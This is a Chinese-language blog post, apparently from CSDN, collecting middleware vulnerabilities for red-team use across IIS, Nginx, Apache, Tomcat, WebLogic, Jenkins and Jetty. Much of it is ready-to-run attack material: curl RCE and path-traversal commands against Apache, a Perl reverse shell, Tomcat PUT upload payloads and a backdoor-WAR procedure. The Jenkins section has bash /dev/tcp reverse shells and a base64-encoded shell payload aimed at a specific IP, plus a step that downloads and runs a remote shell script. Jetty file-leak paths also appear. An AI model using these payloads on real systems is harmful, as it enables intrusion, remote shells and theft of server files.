2023年红队渗透-中间件可利用漏洞汇总

已于 2023-08-31 19:41:29 修改
阅读量471 收藏 4
点赞数 1
分类专栏: 漏洞复现 文章标签: 中间件 安全
于 2023-08-31 19:22:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/apple_52661176/article/details/132607322
版权

目录

0 前言

1 IIS

1.1 短文件

1.2 文件解析

1.3 HTTP.SYS

1.4 其他

2 Nginx

2.1 后缀解析 CVE-2013-4547 

2.2 DDOS攻击 CVE_2021_23017

2.3 其他

3 Apache

3.1 命令执行 RCE cve_2021_42013  

3.2 目录穿越 cve_2021_41773 

3.3 文件解析 cve-2017-15715  

3.4 其他

4 Tomcat

4.1 弱口令破解 后台shell

4.2 文件上传 CVE-2017-12615 

4.3 文件包含 cve_2020_1938 

4.4 其他

5 Weblogic

5.1 工具梭哈

5.2 cve汇总

6 Jenkins

6.1 文件上传 cve_2017_1000353 

6.2 命令执行 CVE-2018-1000861

6.3 其他

7 Jetty

7.1 敏感信息泄漏 CVE-2021-28164

0 前言

        在实战中,已经有很多老漏洞遇不到了,本文汇总了2023年实战中在中间件方面比较常见的可利用的漏洞。

1 IIS

1.1 短文件

信息收集 

1.2 文件解析

还有点用 

1.3 HTTP.SYS

蓝屏崩溃

1.4 其他

CVE-2017-7269   条件苛刻无意义

2 Nginx

2.1 后缀解析 CVE-2013-4547 

配置不当:该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。

影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7

2.2 DDOS攻击 CVE_2021_23017

漏洞poc:https://github.com/M507/CVE-2021-23017-PoC

ddos攻击  无EXP有POC

2.3 其他

cve_2017_7529   意义不大

3 Apache

3.1 命令执行 RCE cve_2021_42013  

影响版本仅影响 Apache 2.4.49 和 Apache 2.4.50,而不影响更早版本。

漏洞poc

curl --data "echo;id" 'http://xx.xx.xx.xx/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

curl --data "echo;id" 'http://xx.xx.xx.xx/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh 

反弹shell:(修改id部分)

echo;perl -e 'use Socket;$i="xx.xx.xx.xx";$p=xxxx;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

3.2 目录穿越 cve_2021_41773 

影响版本2.4.492.4.50

漏洞poc:直接访问

curl -v --path-as-is 'http://xx.xx.xx.xx/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'

GET /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd

3.3 文件解析 cve-2017-15715  

影响版本: 2.4.0~2.4.29

漏洞poc:在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。

3.4 其他

cve_2017_9798 价值不高

cve_2018_11759 价值不高

cve_2021_37580 插件问题

4 Tomcat

4.1 弱口令破解 后台shell

弱口令猜解:https://github.com/BeichenDream/Godzilla

漏洞复现步骤配置不当导致后台弱口令,可通过上传jsp压缩包改名的war拿shell

1. 先爆破弱口令

2. 后门压缩zip改war

3. 上传war访问链接

4.2 文件上传 CVE-2017-12615 

影响版本:Apache Tomcat 7.0.0 - 7.0.79

漏洞复现

抓包直接更改数据包

PUT /x.jsp/

PUT /xx.jsp%20

PUT /xxx.jsp::$DATA

4.3 文件包含 cve_2020_1938 

        Apache Tomcat AJP协议(默认8009端口)由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp目录下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步结合文件包含实现远程代码的执行。

影响版本

Tomcat 6.*

Tomcat 7.* < 7.0.100

Tomcat 8.* < 8.5.51

Tomcat 9.* < 9.0.31

利用工具

https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

执行命令:读取WEB-INF/web.xml配置文件

D:\Python2.7\python.exe .\CNVD-2020-10487-Tomcat-Ajp-lfi.py 47.98.193.176 -p 35839 -f WEB-INF/web.xml

4.4 其他

cve_2020_11996 拒绝服务:危害过大,权限无关,意义不大

cve_2020_9484 反序列化:利用条件太苛刻,意义不大

Weblogic

5.1 工具梭哈

weblogic没啥好说的,直接工具跑,几乎全部集成了。

Weblogic是Oracle公司推出的J2EE应用服务器。

默认端口:7001

工具地址:https://github.com/KimJun1010/WeblogicTool

5.2 cve汇总

CVE-2023-21839(JNDI)

CVE-2020-2551(JRMP)

CVE-2020-2551

CVE-2020-2555

CVE-2020-2883

CVE-2020-14882未授权访问

CVE-2018-2894

CVE-2018-2628(JRMP)

CVE-2018-2893(JRMP)

CVE-2018-3245(JRMP)

CVE_2018_3252(JRMP)

CVE_2018_3191

CVE-2016-3510

CVE-2016-0638

CVE-2017-10271

CVE-2017-3248(JRMP)

CVE-2015-4852

6 Jenkins

        Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作。

默认端口:8080

6.1 文件上传 cve_2017_1000353 

JDK-1.8.0_291 其他版本失效

工具地址:http://github.com/vulhub/CVE-2017-1000353

漏洞exp

bash -i >& /dev/tcp/47.94.236.117/5566 0>&1

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzY2ODggMD4mMQ==}|{base64,-d}|{bash,-i}"

python exploit.py http://123.58.236.76:54217 jenkins_poc.ser

6.2 命令执行 CVE-2018-1000861

工具地址:https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc

漏洞exp

bash -i >& /dev/tcp/47.94.236.117/5566 0>&1

python3 -m http.server 8888

python2 exp.py http://123.58.236.76:52281/ "curl -o /tmp/1.sh http://47.94.236.117:8888/shell.txt"

python2 exp.py http://123.58.236.76:52281/ "bash /tmp/1.sh"

6.3 其他

cve_2019_100300   远程代码执行   需要用户帐号密码

7 Jetty

        Jetty是一个开源的servlet容器,它为基于Java的Web容器提供运行环境。

7.1 敏感信息泄漏 CVE-2021-28164

/%2e/WEB-INF/web.xml

/.%00/WEB-INF/web.xml

/%u002e/WEB-INF/web.xml

/static?/WEB-INF/web.xml

/a/b/..%00/WEB-INF/web.xml

gnolnaituil
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
红队渗透打点工具-FindUpload
03-07
FindUpload是一款红队打点工具,帮助渗透测试人员批量url快速发现文件上传点和登录框,提高渗透测试效率和减少手工发现时间。
CVE-2023-40477 WinRAR 远程代码执行漏洞 0Day PoC
【Rainbow Network Technology co., LTD】
09-02 1263
“Game of Rars” – 通过概念验证探索 WinRAR 中新的远程代码执行漏洞
WEB-INF/web.xml泄露漏洞及其利用
Mrs_H的博客
08-10 9537
前言 之所以写这篇文章,是因为最近在做题的时候,做到了一个有关java的题目。因为对Java Web方面的开发经验很少,所以在做这道题的时候,查了一些关于Java Web相关的知识。感觉以后说不定还会用到,就以这篇文章来总结一下。 关于WEB-INF/web.xml 在了解WEB-INF/web.xml泄露之前,我们先要知道,web.xml是一个什么样的文件,以及它的泄露会出现哪些问题。 咱们先来看看WEB-INF这个文件夹 WEB-INF主要包含以下内容: /WEB-INF/web.xml:Web应用程
WEB-INF下web.xml配置文件
Tony-Yao46989654的博客
01-05 2497
WEB-INF下web.xml配置文件 <?xml version="1.0" encoding="UTF-8"?> <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://x
weblogic漏洞利用工具-WeblogicTool
siu~
08-17 1582
WeblogicTool,GUI漏洞利用工具,支持漏洞检测、命令执行、内存马注入、密码解密等(深信服深蓝实验室天威战队强力驱动)
vulhub漏洞复现30_Jetty
weixin_44193247的博客
02-04 3486
vulhub漏洞复现练习篇
Goby红队版-win-x64-2.4.7版本
07-27
Goby红队专版:集成1500个poc和exp ,覆盖普通版本所有功能,开箱即用 使用方式: 解压后双击goby.exe运行即可 注意事项: 最新的漏洞不可以在线更新,可自行添加poc和exp 重要的事情说三遍 不要用于非法或未授权...
goby红队&社区版-win-64-2.4.7
最新发布
11-27
包含goby红队版和社区版
goby红队-x64-2.4.8(win和linux)
05-16
Goby 是一款基于客户端的安全漏洞扫描工具,适用于红队、蓝队或者渗透测试的场景。与同类产品相比,其主要优势包括高速扫描、低误报率和丰富的外部扩展等。 红队版 Goby 增加了一系列如 Celerystalk、BloodHound、...
红队渗透测试攻防学习工具分析研究资料汇总.pdf
03-10
红队渗透测试攻防学习工具分析研究资料汇总.pdf
常见中间件漏洞总结PPT
01-25
常见中间件漏洞总结PPT,内含tomcat、weblogic、Nginx、iis、jboss等的常见漏洞和介绍,培训学习均可用。
Weblogic漏洞利用工具的下载以及使用方法,附带链接
2301_76983011的博客
10-07 394
完成之后就是这样的一个压缩包,别担心,我这里的文件图标开始也是白色的,因为我是用idea打开的,(idea网上有教程,这里不说了)网上说的是把它放到你的jdk的bin目录下直接cmd敲一段命令,但是我的不管用,也没有人说这种问题,我也不知道咋解决。#有些时候自己一个人在网上找工具的时候真的挺难的,比如我,好不容易找到了可以下载的链接,下载完系统又告诉我不能安装,真的好难。网上解决的方法又如出一辙,对自己根本没太大的帮助。之前找了好多weblogic的下载链接,下载的很慢,完了之后又安装不了,真的想骂人!
2023 最具威胁的 25 种安全漏洞 (CWE TOP 25)
博客
07-14 372
CWE Top 25 是通过分析美国国家漏洞数据库 (NVD) 中的公共漏洞数据来计算的,以获取前两个日历 CWE 弱点的根本原因映射
wlst(Weblogic Script Tool)
金溪的博客
07-07 1192
WebLogic 脚本工具 (WebLogic Scripting Tool , WLST) 是一种命令行脚本界面,系统管理员和操作员用它来监视和管理 WebLogic Server 实例以及域。WLST 脚本环境基于 Java 脚本解释器 Jython。除 WebLogic 脚本功能外,还可以使用解释语言(包括本地变量、条件变量以及流控制语句)的常用功能。WebLogic Server 开发人员...
Web中间件常见漏洞
m0_52923241的博客
02-22 1211
如果攻击者通过begin.do上传的话,Weblogic在服务端会判断有没有upload目录,如果不存在会自动创建,再接着在upload目录下创建Rs_Upload_格式化后的作为目录名,紧接着获取到import_file_name字段名作为后续的文件名拼接的一部分;将/etc/php5/fpm/pool.d/www.conf中security.limit_extensions = .php中.php删除,再次在浏览器中打开,成功解析。使用burpsuite抓包,上传,得到返回的数据包中的时间戳;
Jetty 不明确路径信息泄露漏洞 (CVE-2021-28164)
m0_52663093的博客
06-14 3268
Jetty 不明确路径信息泄露漏洞 (CVE-2021-28164)
web服务器/中间件漏洞系列6:jetty漏洞汇总
热门推荐
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
12-02 1万+
JETTY简介: Jetty作为Eclipse基金会的一部分,是一个纯粹的基于Java的网页服务器和Java Servlet容器,其支持最新的Java Servlet API,同时支持WebSocket,SPDY,HTTP/2协议。 一、CVE-2021-28164 [34429] 敏感信息泄露 1、漏洞简介: 在Jetty9.4.37版本中,为了符合RFC3986中的规范,选择性地支持可能有歧义解释的URI,默认模式允许URL编码,简单看下RFC3986(替代RFC2396)的规定 其大致意思是:.和.
(CVE-2021-28164/CVE-2021-34429)Eclipse Jetty WEB-INF敏感信息泄露漏洞分析
weixin_50464560的博客
10-04 7940
本文主要从Jetty的两个WEB-INF信息泄露漏洞CVE-2021-28164和CVE-2021-34429,来分析如何通过编码和相对路径来绕过对敏感信息的校验,以及Jetty中对URL的PATH的解析方式和存在的问题。 漏洞信息 Jetty作为Eclipse基金会的一部分,是一个纯粹的基于Java的网页服务器和Java Servlet容器,其支持最新的Java Servlet API,同时支持WebSocket,SPDY,HTTP/2协议。 在Jetty9.4.37版本...
常见中间件漏洞(上)
qq_44768719的博客
11-14 1756
iis: 1.put漏洞 原因:在web服务扩展中开启了webDAV,配置了可以任意写入的权限 。 判断方法:将get请求改为options,根据返回的报文判断是否允许put方法 利用:可以用工具使用,自行百度 2.短文件名猜解: 原因:访问构造的某个存在的短文件名,会返回404,访问构造的某个不存在的短文件名,返回400。 利用形式:需要用到通配符,*可以匹配n个字符,也可以为0个。 举例:1. http://www.target.com/*~1****/a.aspx 2. http://www.t
红队渗透测试lampiao
09-14
4. 利用漏洞进行渗透:一旦你发现了可能存在的漏洞,你可以使用相应的漏洞利用工具或手动方法来利用这些漏洞。这将帮助你获取更深入的访问权限,并探索靶机内部的潜在目标。 注意:在进行任何渗透测试之前,请确保...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值